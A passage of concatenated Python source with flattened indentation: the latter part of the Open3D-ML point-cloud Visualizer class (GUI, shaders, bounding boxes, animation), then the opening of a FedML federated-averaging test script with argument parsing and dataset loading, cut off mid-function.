h.add_child(self._play)
h.add_stretch()
v.add_child(h)
self._panel.add_child(model)
# Coloring
properties = gui.CollapsableVert("Properties", 0, indented_margins)
grid = gui.VGrid(2, 0.25 * em)
# ... data source
self._datasource_combobox = gui.Combobox()
self._datasource_combobox.set_on_selection_changed(
self._on_datasource_changed)
self._colormap_channel = gui.Combobox()
self._colormap_channel.add_item("0")
self._colormap_channel.set_on_selection_changed(
self._on_channel_changed)
h = gui.Horiz()
h.add_child(self._datasource_combobox)
h.add_fixed(em)
h.add_child(gui.Label("Index"))
h.add_child(self._colormap_channel)
grid.add_child(gui.Label("Data"))
grid.add_child(h)
# ... shader
self._shader = gui.Combobox()
self._shader.add_item(self.SOLID_NAME)
self._shader.add_item(self.LABELS_NAME)
self._shader.add_item(self.RAINBOW_NAME)
self._shader.add_item(self.GREYSCALE_NAME)
self._shader.add_item(self.COLOR_NAME)
self._colormaps[self.RAINBOW_NAME] = Colormap.make_rainbow()
self._colormaps[self.GREYSCALE_NAME] = Colormap.make_greyscale()
self._shader.selected_index = 0
self._shader.set_on_selection_changed(self._on_shader_changed)
grid.add_child(gui.Label("Shader"))
grid.add_child(self._shader)
properties.add_child(grid)
# ... shader panels
self._shader_panels = gui.StackedWidget()
panel_idx = 0
# ... sub-panel: single color
self._color_panel = gui.Vert()
self._shader_panels.add_child(self._color_panel)
self._shadername2panelidx[self.SOLID_NAME] = panel_idx
panel_idx += 1
self._color = gui.ColorEdit()
self._color.color_value = gui.Color(0.5, 0.5, 0.5)
self._color.set_on_value_changed(self._on_shader_color_changed)
h = gui.Horiz()
h.add_child(gui.Label("Color"))
h.add_child(self._color)
self._color_panel.add_child(h)
# ... sub-panel: labels
self._labels_panel = gui.Vert()
self._shader_panels.add_child(self._labels_panel)
self._shadername2panelidx[self.LABELS_NAME] = panel_idx
panel_idx += 1
self._label_edit = self.LabelLUTEdit()
self._label_edit.set_on_changed(self._on_labels_changed)
self._labels_panel.add_child(gui.Label("Labels"))
self._labels_panel.add_child(self._label_edit.widget)
# ... sub-panel: colormap
self._colormap_panel = gui.Vert()
self._shader_panels.add_child(self._colormap_panel)
self._shadername2panelidx[self.RAINBOW_NAME] = panel_idx
self._shadername2panelidx[self.GREYSCALE_NAME] = panel_idx
panel_idx += 1
self._colormap_edit = self.ColormapEdit(self.window, em)
self._colormap_edit.set_on_changed(self._on_colormap_changed)
self._colormap_panel.add_child(self._colormap_edit.widget)
# ... sub-panel: RGB
self._rgb_panel = gui.Vert()
self._shader_panels.add_child(self._rgb_panel)
self._shadername2panelidx[self.COLOR_NAME] = panel_idx
panel_idx += 1
self._rgb_combo = gui.Combobox()
self._rgb_combo.add_item("255")
self._rgb_combo.add_item("1.0")
self._rgb_combo.set_on_selection_changed(self._on_rgb_multiplier)
h = gui.Horiz(0.5 * em)
h.add_child(gui.Label("Max value"))
h.add_child(self._rgb_combo)
self._rgb_panel.add_child(h)
properties.add_fixed(em)
properties.add_child(self._shader_panels)
self._panel.add_child(properties)
# Populate tree, etc.
for name in self._objects.data_names:
self._add_tree_name(name)
self._update_datasource_combobox()
def set_lut(self, attr_name, lut):
"""Set the LUT for a specific attribute.
Args:
attr_name: The attribute name as string.
lut: The LabelLUT object that should be updated.
"""
self._attrname2lut[attr_name] = lut
def setup_camera(self):
"""Set up camera for visualization."""
selected_names = self._get_selected_names()
selected_bounds = [
self._objects.calc_bounds_for(n) for n in selected_names
]
min_val = [1e30, 1e30, 1e30]
max_val = [-1e30, -1e30, -1e30]
for b in selected_bounds:
for i in range(0, 3):
min_val[i] = min(min_val[i], b[0][i])
max_val[i] = max(max_val[i], b[1][i])
bounds = o3d.geometry.AxisAlignedBoundingBox(min_val, max_val)
self._3d.setup_camera(60, bounds, bounds.get_center())
def show_geometries_under(self, name, show):
"""Show geometry for a given node."""
prefix = name
for (n, node) in self._name2treenode.items():
if n.startswith(prefix):
self._3d.scene.show_geometry(n, show)
node.checkbox.checked = show
self._3d.force_redraw()
def _add_tree_name(self, name, is_geometry=True):
names = name.split("/")
parent = self._dataset.get_root_item()
for i in range(0, len(names) - 1):
n = "/".join(names[:i + 1]) + "/"
if n in self._name2treeid:
parent = self._name2treeid[n]
else:
def on_parent_checked(checked):
self.show_geometries_under(n, checked)
cell = gui.CheckableTextTreeCell(n, True, on_parent_checked)
parent = self._dataset.add_item(parent, cell)
self._name2treenode[n] = cell
self._name2treeid[n] = parent
self._treeid2name[parent] = n
def on_checked(checked):
self._3d.scene.show_geometry(name, checked)
if self._is_tree_name_geometry(name):
# available attrs could change
self._update_datasource_combobox()
self._update_bounding_boxes()
self._3d.force_redraw()
cell = gui.CheckableTextTreeCell(names[-1], True, on_checked)
if is_geometry:
cell.label.text_color = gui.Color(1.0, 0.0, 0.0, 1.0)
node = self._dataset.add_item(parent, cell)
self._name2treenode[name] = cell
self._treeid2name[node] = name
self._slider.set_limits(0, len(self._objects.data_names) - 1)
if len(self._objects.data_names) == 1:
self._slider_current.text = name
def _load_geometry(self, name, ui_done_callback):
progress_dlg = Visualizer.ProgressDialog("Loading...", self.window, 2)
progress_dlg.set_text("Loading " + name + "...")
def load_thread():
result = self._objects.load(name)
progress_dlg.post_update("Loading " + name + "...")
gui.Application.instance.post_to_main_thread(
self.window, ui_done_callback)
gui.Application.instance.post_to_main_thread(
self.window, self.window.close_dialog)
self.window.show_dialog(progress_dlg.dialog)
threading.Thread(target=load_thread).start()
def _load_geometries(self, names, ui_done_callback):
# Progress has: len(names) items + ui_done_callback
progress_dlg = Visualizer.ProgressDialog("Loading...", self.window,
len(names) + 1)
progress_dlg.set_text("Loading " + names[0] + "...")
def load_thread():
for i in range(0, len(names)):
result = self._objects.load(names[i], True)
if i + 1 < len(names):
text = "Loading " + names[i + 1] + "..."
else:
text = "Creating GPU objects..."
progress_dlg.post_update(text)
if result:
self._name2treenode[names[i]].label.text_color = gui.Color(
0.0, 1.0, 0.0, 1.0)
else:
break
gui.Application.instance.post_to_main_thread(
self.window, ui_done_callback)
gui.Application.instance.post_to_main_thread(
self.window, self.window.close_dialog)
self.window.show_dialog(progress_dlg.dialog)
threading.Thread(target=load_thread).start()
def _update_geometry(self, check_unloaded=False):
if check_unloaded:
for name in self._objects.data_names:
if not self._objects.is_loaded(name):
self._3d.scene.remove_geometry(name)
material = self._get_material()
for n, tcloud in self._objects.tclouds.items():
self._update_point_cloud(n, tcloud, material)
if not tcloud.is_empty():
self._name2treenode[n].label.text_color = gui.Color(
0.0, 1.0, 0.0, 1.0)
if self._3d.scene.has_geometry(n):
self._3d.scene.modify_geometry_material(n, material)
else:
self._name2treenode[n].label.text_color = gui.Color(
1.0, 0.0, 0.0, 1.0)
self._name2treenode[n].checkbox.checked = False
self._3d.force_redraw()
def _update_point_cloud(self, name, tcloud, material):
if self._dont_update_geometry:
return
if tcloud.is_empty():
return
attr_name = self._datasource_combobox.selected_text
attr = None
flag = 0
attr = self._objects.get_attr(name, attr_name)
# Update scalar values
if attr is not None:
if len(attr.shape) == 1:
scalar = attr
else:
channel = max(0, self._colormap_channel.selected_index)
scalar = attr[:, channel]
else:
shape = [len(tcloud.point["points"].numpy())]
scalar = np.zeros(shape, dtype='float32')
tcloud.point["__visualization_scalar"] = Visualizer._make_tcloud_array(
scalar)
flag |= rendering.Scene.UPDATE_UV0_FLAG
# Update RGB values
if attr is not None and (len(attr.shape) == 2 and attr.shape[1] >= 3):
max_val = float(self._rgb_combo.selected_text)
if max_val <= 0:
max_val = 255.0
colors = attr[:, [0, 1, 2]] * (1.0 / max_val)
tcloud.point["colors"] = Visualizer._make_tcloud_array(colors)
flag |= rendering.Scene.UPDATE_COLORS_FLAG
# Update geometry
if self._3d.scene.scene.has_geometry(name):
self._3d.scene.scene.update_geometry(name, tcloud, flag)
else:
self._3d.scene.add_geometry(name, tcloud, material)
node = self._name2treenode[name]
if node is not None:
self._3d.scene.show_geometry(name, node.checkbox.checked)
def _get_material(self):
self._update_gradient()
material = rendering.Material()
if self._shader.selected_text == self.SOLID_NAME:
material.shader = "unlitSolidColor"
c = self._color.color_value
material.base_color = [c.red, c.green, c.blue, 1.0]
elif self._shader.selected_text == self.COLOR_NAME:
material.shader = "defaultUnlit"
material.base_color = [1.0, 1.0, 1.0, 1.0]
else:
material.shader = "unlitGradient"
material.gradient = self._gradient
material.scalar_min = self._scalar_min
material.scalar_max = self._scalar_max
return material
def _update_bounding_boxes(self, animation_frame=None):
if len(self._attrname2lut) == 1:
# Can't do dict.values()[0], so have to iterate over the 1 element
for v in self._attrname2lut.values():
lut = v
elif "labels" in self._attrname2lut:
lut = self._attrname2lut["labels"]
elif "label" in self._attrname2lut:
lut = self._attrname2lut["label"]
else:
lut = None
mat = rendering.Material()
mat.shader = "unlitLine"
mat.line_width = 2 * self.window.scaling
if self._consolidate_bounding_boxes:
name = Model.bounding_box_prefix.split("/")[0]
boxes = []
# When consolidated we assume bbox_data.name is the geometry name.
if animation_frame is None:
for bbox_data in self._objects.bounding_box_data:
if bbox_data.name in self._name2treenode and self._name2treenode[
bbox_data.name].checkbox.checked:
boxes += bbox_data.boxes
else:
geom_name = self._animation_frames[animation_frame]
for bbox_data in self._objects.bounding_box_data:
if bbox_data.name == geom_name:
boxes = bbox_data.boxes
break
self._3d.scene.remove_geometry(name)
if len(boxes) > 0:
lines = BoundingBox3D.create_lines(boxes, lut)
self._3d.scene.add_geometry(name, lines, mat)
if name not in self._name2treenode:
self._add_tree_name(name, is_geometry=False)
self._3d.force_redraw()
else:
# Don't run this more than once if we aren't consolidating,
# because nothing will change.
if len(self._objects.bounding_box_data) > 0:
if self._objects.bounding_box_data[
0].name in self._name2treenode:
return
for bbox_data in self._objects.bounding_box_data:
lines = BoundingBox3D.create_lines(bbox_data.boxes, lut)
self._3d.scene.add_geometry(bbox_data.name, lines, mat)
for bbox_data in self._objects.bounding_box_data:
self._add_tree_name(bbox_data.name, is_geometry=False)
self._3d.force_redraw()
def _update_gradient(self):
if self._shader.selected_text == self.LABELS_NAME:
colors = self._label_edit.get_colors()
n = float(len(colors) - 1)
if n >= 1:
self._gradient.points = [
rendering.Gradient.Point(
float(i) / n, [
colors[i][0], colors[i][1], colors[i][2],
colors[i][3]
]) for i in range(0, len(colors))
]
else:
self._gradient.points = [
rendering.Gradient.Point(0.0, [1.0, 0.0, 1.0, 1.0])
]
self._gradient.mode = rendering.Gradient.LUT
else:
cmap = self._colormaps.get(self._shader.selected_text)
if cmap is not None:
self._gradient.points = [
rendering.Gradient.Point(
p.value, [p.color[0], p.color[1], p.color[2], 1.0])
for p in cmap.points
]
self._gradient.mode = rendering.Gradient.GRADIENT
def _update_geometry_colors(self):
material = self._get_material()
for name, tcloud in self._objects.tclouds.items():
if not tcloud.is_empty() and self._3d.scene.has_geometry(name):
self._3d.scene.modify_geometry_material(name, material)
self._3d.force_redraw()
def _update_datasource_combobox(self):
current = self._datasource_combobox.selected_text
self._datasource_combobox.clear_items()
available_attrs = self._get_available_attrs()
for attr_name in available_attrs:
self._datasource_combobox.add_item(attr_name)
if current in available_attrs:
self._datasource_combobox.selected_text = current
elif len(available_attrs) > 0:
self._datasource_combobox.selected_text = available_attrs[0]
else:
# If no attributes, two possibilities:
# 1) no geometries are selected: don't change anything
# 2) geometries are selected: color solid
has_checked = False
for n, node in self._name2treenode.items():
if node.checkbox.checked and self._is_tree_name_geometry(n):
has_checked = True
break
if has_checked:
self._set_shader(self.SOLID_NAME)
def _update_shaders_combobox(self):
current_attr = self._datasource_combobox.selected_text
current_shader = self._shader.selected_text
has_lut = (current_attr in self._attrname2lut)
is_scalar = True
selected_names = self._get_selected_names()
if len(selected_names) > 0 and len(
self._objects.get_attr_shape(selected_names[0],
current_attr)) > 1:
is_scalar = False
self._shader.clear_items()
if not is_scalar:
self._shader.add_item(self.COLOR_NAME)
if has_lut:
self._shader.add_item(self.LABELS_NAME)
self._label_edit.set_labels(self._attrname2lut[current_attr])
self._shader.add_item(self.RAINBOW_NAME)
self._shader.add_item(self.GREYSCALE_NAME)
self._shader.add_item(self.SOLID_NAME)
if current_shader == self.LABELS_NAME and has_lut:
self._set_shader(self.LABELS_NAME)
elif is_scalar:
self._set_shader(self.RAINBOW_NAME)
def _update_attr_range(self):
attr_name = self._datasource_combobox.selected_text
current_channel = self._colormap_channel.selected_index
self._scalar_min, self._scalar_max = self._objects.get_attr_minmax(
attr_name, current_channel)
if self._shader.selected_text in self._colormaps:
cmap = self._colormaps[self._shader.selected_text]
self._colormap_edit.update(cmap, self._scalar_min, self._scalar_max)
def _set_shader(self, shader_name, force_update=False):
# Disable channel if we are using a vector shader. Always do this to
# ensure that the UI is consistent.
if shader_name == Visualizer.COLOR_NAME:
self._colormap_channel.enabled = False
else:
self._colormap_channel.enabled = True
if shader_name == self._shader.selected_text and not force_update:
return
self._shader.selected_text = shader_name
idx = self._shadername2panelidx[self._shader.selected_text]
self._shader_panels.selected_index = idx
if shader_name in self._colormaps:
cmap = self._colormaps[shader_name]
self._colormap_edit.update(cmap, self._scalar_min, self._scalar_max)
self._update_geometry_colors()
def _on_layout(self, context):
frame = self.window.content_rect
em = context.theme.font_size
panel_width = 20 * em
panel_rect = gui.Rect(frame.get_right() - panel_width, frame.y,
panel_width, frame.height - frame.y)
self._panel.frame = panel_rect
self._3d.frame = gui.Rect(frame.x, frame.y, panel_rect.x - frame.x,
frame.height - frame.y)
def _on_arcball_mode(self):
self._3d.set_view_controls(gui.SceneWidget.ROTATE_CAMERA)
def _on_fly_mode(self):
self._3d.set_view_controls(gui.SceneWidget.FLY)
def _on_reset_camera(self):
self.setup_camera()
def _on_dataset_selection_changed(self, item):
name = self._treeid2name[item]
if not self._is_tree_name_geometry(name):
return
def ui_callback():
self._update_attr_range()
self._update_geometry(check_unloaded=True)
self._update_bounding_boxes()
if not self._objects.is_loaded(name):
self._load_geometry(name, ui_callback)
def _on_display_tab_changed(self, index):
if index == 1:
self._animation_frames = self._get_selected_names()
self._slider.set_limits(0, len(self._animation_frames) - 1)
self._on_animation_slider_changed(self._slider.int_value)
# _on_animation_slider_changed() calls _update_bounding_boxes()
else:
for name, node in self._name2treenode.items():
self._3d.scene.show_geometry(name, node.checkbox.checked)
self._update_bounding_boxes()
def _on_animation_slider_changed(self, new_value):
idx = int(new_value)
for i in range(0, len(self._animation_frames)):
self._3d.scene.show_geometry(self._animation_frames[i], (i == idx))
self._update_bounding_boxes(animation_frame=idx)
self._3d.force_redraw()
self._slider_current.text = self._animation_frames[idx]
r = self._slider_current.frame
self._slider_current.frame = gui.Rect(r.x, r.y,
self._slider.frame.get_right(),
r.height)
def _on_start_animation(self):
def on_tick():
return self._on_animate()
self._play.text = "Stop"
self._play.set_on_clicked(self._on_stop_animation)
self._last_animation_time = 0.0
self.window.set_on_tick_event(on_tick)
def _on_animate(self):
now = time.time()
if now >= self._last_animation_time + self._animation_delay_secs:
idx = (self._slider.int_value + 1) % len(self._animation_frames)
self._slider.int_value = idx
self._on_animation_slider_changed(idx)
self._last_animation_time = now
return True
return False
def _on_stop_animation(self):
self.window.set_on_tick_event(None)
self._play.text = "Play"
self._play.set_on_clicked(self._on_start_animation)
def _on_bgcolor_changed(self, new_color):
bg_color = [
new_color.red, new_color.green, new_color.blue, new_color.alpha
]
self._3d.scene.set_background(bg_color)
self._3d.force_redraw()
def _on_datasource_changed(self, attr_name, idx):
selected_names = self._get_selected_names()
n_channels = 1
if len(selected_names) > 0:
shape = self._objects.get_attr_shape(selected_names[0], attr_name)
if len(shape) <= 1:
n_channels = 1
else:
n_channels = max(1, shape[1])
current_channel = max(0, self._colormap_channel.selected_index)
current_channel = min(n_channels - 1, current_channel)
self._colormap_channel.clear_items()
for i in range(0, n_channels):
self._colormap_channel.add_item(str(i))
self._colormap_channel.selected_index = current_channel
self._update_attr_range()
self._update_shaders_combobox()
# Try to intelligently pick a shader.
current_shader = self._shader.selected_text
if current_shader == Visualizer.SOLID_NAME:
pass
elif attr_name in self._attrname2lut:
self._set_shader(Visualizer.LABELS_NAME)
elif attr_name == "colors":
self._set_shader(Visualizer.COLOR_NAME)
elif n_channels >= 3:
self._set_shader(Visualizer.RAINBOW_NAME)
elif current_shader == Visualizer.COLOR_NAME: # vector -> scalar
self._set_shader(Visualizer.RAINBOW_NAME)
else: # changing from one scalar to another, don't change
pass
self._update_geometry()
def _on_channel_changed(self, name, idx):
self._update_attr_range()
self._update_geometry() # need to recompute scalars array
def _on_shader_changed(self, name, idx):
# _shader.current_text is already name, so we need to force an update
self._set_shader(name, force_update=True)
def _on_shader_color_changed(self, color):
self._update_geometry_colors()
def _on_labels_changed(self):
self._update_geometry_colors()
def _on_colormap_changed(self):
self._colormaps[
self._shader.selected_text] = self._colormap_edit.colormap
self._update_geometry_colors()
def _on_rgb_multiplier(self, text, idx):
self._update_geometry()
def _get_selected_names(self):
# Note that things like bounding boxes could be in the tree, and we
# do not want to include them in the list of things selected, even if
# they are checked.
selected_names = []
for n in self._objects.data_names:
if self._name2treenode[n].checkbox.checked:
selected_names.append(n)
return selected_names
def _get_available_attrs(self):
selected_names = self._get_selected_names()
return self._objects.get_available_attrs(selected_names)
def _is_tree_name_geometry(self, name):
return (name in self._objects.data_names)
@staticmethod
def _make_tcloud_array(np_array, copy=False):
if copy or not np_array.data.c_contiguous:
return o3d.core.Tensor(np_array)
else:
return o3d.core.Tensor.from_numpy(np_array)
def visualize_dataset(self,
dataset,
split,
indices=None,
width=1024,
height=768):
"""
Visualize a dataset.
Example:
Minimal example for visualizing a dataset::
import open3d.ml.torch as ml3d # or open3d.ml.tf as ml3d
dataset = ml3d.datasets.SemanticKITTI(dataset_path='/path/to/SemanticKITTI/')
vis = ml3d.vis.Visualizer()
vis.visualize_dataset(dataset, 'all', indices=range(100))
Args:
dataset: The dataset to use for visualization.
split: The dataset split to be used, such as 'training'
indices: An iterable with a subset of the data points to visualize, such as [0,2,3,4].
width: The width of the visualization window.
height: The height of the visualization window.
"""
# Setup the labels
lut = LabelLUT()
for val in sorted(dataset.label_to_names.values()):
lut.add_label(val, val)
self.set_lut("labels", lut)
self._consolidate_bounding_boxes = True
self._init_dataset(dataset, split, indices)
self._visualize("Open3D - " + dataset.name, width, height)
def visualize(self,
data,
lut=None,
bounding_boxes=None,
width=1024,
height=768):
"""
Visualize a custom point cloud data.
Example:
Minimal example for visualizing a single point cloud with an
attribute::
import numpy as np
import open3d.ml.torch as ml3d
# or import open3d.ml.tf as ml3d
data = [ {
'name': 'my_point_cloud',
'points': np.random.rand(100,3).astype(np.float32),
'point_attr1': np.random.rand(100).astype(np.float32),
} ]
vis = ml3d.vis.Visualizer()
vis.visualize(data)
Args:
data: A list of dictionaries. Each dictionary is a point cloud with
attributes. Each dictionary must have the entries 'name' and
'points'. Points and point attributes can be passed as numpy
arrays, PyTorch tensors or TensorFlow tensors.
width: window width.
height: window height.
"""
self._init_data(data)
if lut is not None:
self.set_lut("labels", lut)
if bounding_boxes is not None:
prefix = Model.bounding_box_prefix
# Filament crashes if you have to many items, and anyway, hundreds
# of items is unweildy in a list. So combine items if we have too
# many.
group_size = int(math.floor(float(len(bounding_boxes)) / 100.0))
if group_size < 2:
box_data = [
Model.BoundingBoxData(prefix + str(bbox), [bbox])
for bbox in bounding_boxes
]
else:
box_data = []
current_group = []
n = len(bounding_boxes)
for i in range(0, n):
current_group.append(bounding_boxes[i])
if len(current_group) >= group_size or i == n - 1:
if i < n - 1:
name = prefix + "Boxes " + str(
i + 1 - group_size) + " - " + str(i)
else:
if len(current_group) > 1:
name = prefix + "Boxes " + str(
i + 1 - len(current_group)) + " - " + str(i)
else:
name = prefix + "Box " + str(i)
data = Model.BoundingBoxData(name, current_group)
box_data.append(data)
current_group = []
self._objects.bounding_box_data = box_data
self._visualize("Open3D", width, height)
def _visualize(self, title, width, height):
gui.Application.instance.initialize()
self._init_user_interface(title, width, height)
self._3d.scene.downsample_threshold = 400000
# Turn all the objects off except the first one
for name, node in self._name2treenode.items():
node.checkbox.checked = False
self._3d.scene.show_geometry(name, False)
for name in [self._objects.data_names[0]]:
self._name2treenode[name].checkbox.checked = True
self._3d.scene.show_geometry(name, True)
def on_done_ui():
# Add bounding boxes here: bounding boxes belonging to the dataset
# will not be loaded until now.
self._update_bounding_boxes()
self._update_datasource_combobox()
self._update_shaders_combobox()
# Display "colors" by default if available, "points" if not
available_attrs = self._get_available_attrs()
self._set_shader(self.SOLID_NAME, force_update=True)
if "colors" in available_attrs:
self._datasource_combobox.selected_text = "colors"
elif "points" in available_attrs:
self._datasource_combobox.selected_text = "points"
self._dont_update_geometry = True
self._on_datasource_changed(
self._datasource_combobox.selected_text,
self._datasource_combobox.selected_index)
self._update_geometry_colors()
self._dont_update_geometry = False
# _datasource_combobox was empty, now isn't, re-layout.
self.window.set_needs_layout()
self._update_geometry()
self.setup_camera()
self._load_geometries(self._objects.data_names, on_done_ui)
gui.Application.instance.run()
|
fedavg_test.py | #!/usr/bin/env python3
import json
import multiprocessing
import os
import sys
# add the FedML root directory to the python path
import threading
import time
sys.path.insert(0, os.path.abspath(os.path.join(os.getcwd(), "./../../../../")))
sys.path.insert(0, os.path.abspath(os.path.join(os.getcwd(), "./../../../")))
sys.path.insert(0, os.path.abspath(os.path.join(os.getcwd(), "./../../")))
sys.path.insert(0, os.path.abspath(os.path.join(os.getcwd(), "./../")))
sys.path.insert(0, os.path.abspath(os.path.join(os.getcwd(), "./")))
sys.path.insert(0, os.path.abspath(os.path.join(os.getcwd(), "")))
from fedml_api.distributed.fedavg_cross_silo.FedAvgAPI import FedAvgAPI
from fedml_api.model.cv.efficientnet import EfficientNet
from fedml_api.model.cv.mobilenet_v3 import MobileNetV3
from fedml_api.model.linear.lr import LogisticRegression
from fedml_api.model.nlp.rnn import RNN_OriginalFedAvg, RNN_StackOverFlow
from fedml_api.model.cv.resnet import resnet56
from fedml_api.model.cv.mobilenet import mobilenet
from fedml_api.model.cv.resnet_gn import resnet18
from fedml_api.model.cv.cnn import CNN_DropOut
from fedml_api.data_preprocessing.cinic10.data_loader import load_partition_data_cinic10
from fedml_api.data_preprocessing.cifar100.data_loader import load_partition_data_cifar100
from fedml_api.data_preprocessing.cifar10.data_loader_cross_silo import (
load_partition_data_cifar10 as load_partition_data_cifar10_cross_silo,
)
from fedml_api.data_preprocessing.cifar10.data_loader import load_partition_data_cifar10
from fedml_api.data_preprocessing.Landmarks.data_loader import load_partition_data_landmarks
from fedml_api.data_preprocessing.ImageNet.data_loader import load_partition_data_ImageNet
from fedml_api.data_preprocessing.MNIST.data_loader import load_partition_data_mnist
from fedml_api.data_preprocessing.stackoverflow_nwp.data_loader import load_partition_data_federated_stackoverflow_nwp
from fedml_api.data_preprocessing.stackoverflow_lr.data_loader import load_partition_data_federated_stackoverflow_lr
from fedml_api.data_preprocessing.shakespeare.data_loader import load_partition_data_shakespeare
from fedml_api.data_preprocessing.fed_shakespeare.data_loader import load_partition_data_federated_shakespeare
from fedml_api.data_preprocessing.fed_cifar100.data_loader import load_partition_data_federated_cifar100
from fedml_api.data_preprocessing.FederatedEMNIST.data_loader import load_partition_data_federated_emnist
from fedml_api.distributed.utils.gpu_mapping import mapping_processes_to_gpu_device_from_yaml_file
from fedml_core.distributed.communication import mqtt_s3
from fedml_core.distributed.communication import observer
from fedml_core.distributed.communication import mqtt
from fedml_core.distributed.communication import message
import argparse
import logging
import random
import socket
import numpy as np
import psutil
import setproctitle
import torch
import wandb
from mpi4py import MPI
def FedML_init():
comm = MPI.COMM_WORLD
process_id = comm.Get_rank()
worker_number = comm.Get_size()
return comm, process_id, worker_number
def add_args(parser):
"""
parser : argparse.ArgumentParser
return a parser added with args required by fit
"""
# Training settings
parser.add_argument("--model", type=str, default="mobilenet", metavar="N", help="neural network used in training")
parser.add_argument("--dataset", type=str, default="cifar10", metavar="N", help="dataset used for training")
parser.add_argument("--data_dir", type=str, default="./../../../data/cifar10", help="data directory")
parser.add_argument(
"--partition_method",
type=str,
default="hetero",
metavar="N",
help="how to partition the dataset on local workers",
)
parser.add_argument(
"--partition_alpha", type=float, default=0.5, metavar="PA", help="partition alpha (default: 0.5)"
)
parser.add_argument(
"--client_silo_num_in_total",
type=int,
default=1000,
metavar="NN",
help="number of workers in a distributed cluster",
)
parser.add_argument("--silo_num_per_round", type=int, default=4, metavar="NN", help="number of workers")
parser.add_argument(
"--batch_size", type=int, default=64, metavar="N", help="input batch size for training (default: 64)"
)
parser.add_argument("--client_optimizer", type=str, default="adam", help="SGD with momentum; adam")
parser.add_argument("--backend", type=str, default="MPI", help="Backend for Server and Client")
parser.add_argument("--lr", type=float, default=0.001, metavar="LR", help="learning rate (default: 0.001)")
parser.add_argument("--wd", help="weight decay parameter;", type=float, default=0.0001)
parser.add_argument("--epochs", type=int, default=5, metavar="EP", help="how many epochs will be trained locally")
parser.add_argument("--comm_round", type=int, default=10, help="how many round of communications we shoud use")
parser.add_argument(
"--is_mobile", type=int, default=1, help="whether the program is running on the FedML-Mobile server side"
)
parser.add_argument("--frequency_of_the_test", type=int, default=1, help="the frequency of the algorithms")
parser.add_argument("--gpu_server_num", type=int, default=1, help="gpu_server_num")
parser.add_argument("--gpu_num_per_server", type=int, default=4, help="gpu_num_per_server")
parser.add_argument(
"--gpu_mapping_file",
type=str,
help="the gpu utilization file for servers and clients. If there is no \
gpu_util_file, gpu will not be used.",
)
parser.add_argument(
"--gpu_mapping_key", type=str, default="mapping_default", help="the key in gpu utilization file"
)
parser.add_argument(
"--grpc_ipconfig_path",
type=str,
default="grpc_ipconfig.csv",
help="config table containing ipv4 address of grpc server",
)
parser.add_argument(
"--trpc_master_config_path",
type=str,
default="trpc_master_config.csv",
help="config indicating ip address and port of the master (rank 0) node",
)
parser.add_argument(
"--enable_cuda_rpc",
default=False,
action="store_true",
help="Enable cuda rpc (only for TRPC backend)",
)
parser.add_argument("--silo_node_rank", type=int, default=0, help="rank of the node in silo")
parser.add_argument("--silo_rank", type=int, default=0, help="rank of the silo")
# parser.add_argument(
# "--local_rank", type=int, default=1, help="local rank in the node, Passed by launcher.py"
# )
parser.add_argument("--nnode", type=int, default=1, help="number of nodes in silo")
parser.add_argument("--nproc_per_node", type=int, default=1, help="number of processes in each node")
parser.add_argument("--pg_master_address", type=str, default=1, help="address of the DDP process group master")
parser.add_argument("--pg_master_port", type=int, default=1, help="port of the DDP process group master")
parser.add_argument(
"--silo_gpu_mapping_file",
type=str,
help="the gpu utilization file for silo processes.",
)
# MQTT
parser.add_argument(
"--mqtt_config_path",
type=str,
help="Path of config for mqtt server.",
)
# --------------------------
# S3
parser.add_argument(
"--s3_config_path",
type=str,
help="Path of config for S3 server.",
)
# --------------------------
parser.add_argument(
"--run_id",
type=str,
help="Run id for one federated training workflow.",
)
parser.add_argument(
"--client_ids",
type=str,
help="Client id list in the same federated training run.",
)
parser.add_argument("--ci", type=int, default=0, help="CI")
args = parser.parse_args()
return args
def load_data(args, dataset_name):
if dataset_name == "mnist":
logging.info("load_data. dataset_name = %s" % dataset_name)
(
silo_num,
train_data_num,
test_data_num,
train_data_global,
test_data_global,
train_data_local_num_dict,
train_data_local_dict,
test_data_local_dict,
class_num,
) = load_partition_data_mnist(args.batch_size)
"""
For shallow NN or linear models,
we uniformly sample a fraction of clients each round (as the original FedAvg paper)
"""
args.data_silo_num_in_total = silo_num
elif dataset_name == "femnist":
logging.info("load_data. dataset_name = %s" % dataset_name)
(
silo_num,
train_data_num,
test_data_num,
train_data_global,
test_data_global,
train_data_local_num_dict,
train_data_local_dict,
test_data_local_dict,
class_num,
) = load_partition_data_federated_emnist(args.dataset, args.data_dir)
args.data_silo_num_in_total = silo_num
elif dataset_name == "shakespeare":
logging.info("load_data. dataset_name = %s" % dataset_name)
(
silo_num,
train_data_num,
test_data_num,
train_data_global,
test_data_global,
train_data_local_num_dict,
train_data_local_dict,
test_data_local_dict,
class_num,
) = load_partition_data_shakespeare(args.batch_size)
args.data_silo_num_in_total = silo_num
elif dataset_name == "fed_shakespeare":
logging.info("load_data. dataset_name = %s" % dataset_name)
(
silo_num,
train_data_num,
test_data_num,
train_data_global,
test_data_global,
train_data_local_num_dict,
train_data_local_dict,
test_data_local_dict,
class_num,
) = load_partition_data_federated_shakespeare(args.dataset, args.data_dir)
args.data_silo_num_in_total = silo_num
elif dataset_name == "fed_cifar100":
logging.info("load_data. dataset_name = %s" % dataset_name)
(
silo_num,
train_data_num,
test_data_num,
train_data_global,
test_data_global,
train_data_local_num_dict,
train_data_local_dict,
test_data_local_dict,
class_num,
) = load_partition_data_federated_cifar100(args.dataset, args.data_dir)
args.data_silo_num_in_total = silo_num
elif dataset_name == "stackoverflow_lr":
logging.info("load_data. dataset_name = %s" % dataset_name)
(
silo_num,
train_data_num,
test_data_num,
train_data_global,
test_data_global,
train_data_local_num_dict,
train_data_local_dict,
test_data_local_dict,
class_num,
) = load_partition_data_federated_stackoverflow_lr(args.dataset, args.data_dir)
args.data_silo_num_in_total = silo_num
elif dataset_name == "stackoverflow_nwp":
logging.info("load_data. dataset_name = %s" % dataset_name)
(
silo_num,
train_data_num,
test_data_num,
train_data_global,
test_data_global,
train_data_local_num_dict,
train_data_local_dict,
test_data_local_dict,
class_num,
) = load_partition_data_federated_stackoverflow_nwp(args.dataset, args.data_dir)
args.data_silo_num_in_total = silo_num
elif dataset_name == "ILSVRC2012":
logging.info("load_data. dataset_name = %s" % dataset_name)
(
train_data_num,
test_data_num,
train_data_global,
test_data_global,
train_data_local_num_dict,
train_data_local_dict,
test_data_local_dict,
class_num,
) = load_partition_data_ImageNet(
dataset=dataset_name,
data_dir=args.data_dir,
partition_method=None,
partition_alpha=None,
silo_number=args.data_silo_num_in_total,
batch_size=args.batch_size,
)
elif dataset_name == "gld23k":
